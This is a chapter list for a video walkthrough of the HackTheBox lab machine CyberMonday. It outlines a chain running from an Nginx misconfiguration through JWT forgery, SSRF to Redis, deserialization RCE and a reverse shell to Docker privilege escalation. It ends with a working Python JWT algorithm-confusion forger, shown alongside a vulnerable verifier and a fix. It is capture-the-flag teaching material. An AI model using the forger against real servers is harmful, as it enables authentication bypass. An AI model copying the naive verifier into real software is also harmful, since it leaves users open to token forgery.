HackTheBox - CyberMonday

00:00 - Introduction
00:55 - Start of nmap, playing with the webapp and discovering it is a Laravel PHP app
06:50 - Discovering /assets redirects to /assets/, an indicator of the Nginx off-by-slash misconfiguration [MasterRecon]
11:50 - Using the Nginx off-by-slash to download .env and .git, recovering the app's source code
14:00 - Start of code analysis
15:55 - Finding a Mass Assignment vulnerability in the update functionality
21:50 - Taking some time to explore whether there are ways to find Mass Assignment without reading the code or guessing
27:30 - Looking at the Webhooks-api-beta website, playing with the request and discovering we need to send it JSON
30:40 - Playing with the JWT, discovering it is signed with RS256, and doing an Algorithm Confusion attack: switching the header to HS256 and signing the token with the RSA public key as the HMAC secret
41:50 - Playing with the Webhook and discovering an SSRF; since we control the HTTP method, we can also use it for protocol smuggling
46:30 - Looking at the Redis Migrate functionality, which confirms we can interact with Redis. Also standing up Redis on our box with Docker
52:28 - Inserting a poisoned Laravel cookie, created with phpggc, into Redis and troubleshooting all the encoding issues along the way. Browsing the page deserializes our cookie and gets RCE
1:17:50 - Reverse shell returned; examining the MySQL database and Redis keys
1:30:10 - Uploading a static nmap binary to scan the Docker containers, finding a Docker registry and downloading the API container image to get its source code
1:49:35 - Source code analysis on the webhook code, discovering a file disclosure and a hardcoded API key
2:02:50 - Dumping the environment variables and getting the DB password, which is reused as a user password; SSH in as john
2:08:30 - John can run docker compose on a sanitized compose file; there are a few ways to bypass this check
2:12:10 - Showing we can pass in a raw device, which works without granting the container any extra capabilities but is very dangerous
2:30:30 - Showing we can also mount a volume read-only and grant the container the capability and AppArmor policy needed to remount it read-write
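The algorithm confusion attack from the 30:40 chapter, as an added example that is not part of the video or the box's own code. The `PUBLIC_KEY_PEM` constant is a constructed placeholder (against a real target you paste the PEM exactly as the server serves it, trailing newline included); `verify_naive` mirrors the vulnerable pattern of handing the public key to a decode call that lets the token's own `alg` header pick the algorithm, and `verify_pinned` is the fix. Only the Python standard library is needed for the forgery and the HS256 path; the RS256 branch uses the `cryptography` package if it is installed.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

try:  # Only the RS256 branch needs this; the forgery itself is stdlib-only.
    from cryptography.exceptions import InvalidSignature
    from cryptography.hazmat.primitives import hashes
    from cryptography.hazmat.primitives.asymmetric import padding
    from cryptography.hazmat.primitives.serialization import load_pem_public_key
    _HAVE_CRYPTO = True
except ImportError:
    _HAVE_CRYPTO = False

# Constructed stand-in for the server's RSA public key. The forged HMAC is keyed
# on these literal bytes, so whitespace and the trailing newline must match what
# the real server hands out.
PUBLIC_KEY_PEM = (
    "-----BEGIN PUBLIC KEY-----\n"
    "CONSTRUCTED-PLACEHOLDER-NOT-A-REAL-KEY\n"
    "-----END PUBLIC KEY-----\n"
)


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _segment(obj: dict) -> str:
    # Compact JSON, as JWT libraries emit it.
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def forge_hs256(claims: dict, key_material: str) -> str:
    """Attacker side: header says HS256, signature is an HMAC keyed on the
    server's *public* key bytes, which anyone can download."""
    signing_input = _segment({"typ": "JWT", "alg": "HS256"}) + "." + _segment(claims)
    sig = hmac.new(key_material.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def _verify_rs256(key_pem: str, signing_input: bytes, sig: bytes) -> bool:
    """Genuine RSA check; unreachable for the forged token because its header
    never says RS256. The placeholder PEM above simply fails to load."""
    if not _HAVE_CRYPTO:
        return False
    try:
        load_pem_public_key(key_pem.encode()).verify(
            sig, signing_input, padding.PKCS1v15(), hashes.SHA256())
        return True
    except (ValueError, InvalidSignature):
        return False


def verify_naive(token: str, key_material: str) -> Optional[dict]:
    """Vulnerable verifier: the token's header chooses the algorithm and the same
    key material is handed to whichever branch runs, so the public key becomes
    the HMAC secret."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        sig = b64url_decode(sig_b64)
    except ValueError:  # malformed token, bad base64 or bad JSON
        return None
    signing_input = f"{header_b64}.{payload_b64}".encode()
    alg = header.get("alg")
    if alg == "HS256":
        expected = hmac.new(key_material.encode(), signing_input, hashlib.sha256).digest()
        ok = hmac.compare_digest(expected, sig)
    elif alg == "RS256":
        ok = _verify_rs256(key_material, signing_input, sig)
    else:
        ok = False  # includes alg "none"
    return json.loads(b64url_decode(payload_b64)) if ok else None


def verify_pinned(token: str, key_material: str) -> Optional[dict]:
    """Fix: the server decides the algorithm. Anything but RS256 is rejected
    before any key material is used, so the HMAC path is never reachable."""
    try:
        header = json.loads(b64url_decode(token.split(".")[0]))
    except ValueError:
        return None
    if header.get("alg") != "RS256":
        return None
    return verify_naive(token, key_material)


if __name__ == "__main__":
    forged = forge_hs256({"id": 1, "role": "admin"}, PUBLIC_KEY_PEM)
    print("forged token:", forged)
    print("naive verifier accepts:", verify_naive(forged, PUBLIC_KEY_PEM))
    print("pinned verifier accepts:", verify_pinned(forged, PUBLIC_KEY_PEM))
```

Because the secret is the raw PEM bytes, a key pasted without its trailing newline or with CRLF line endings produces a different HMAC and the forged token is silently rejected; that is the first thing to check when the attack does not land against a server you know to be vulnerable.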
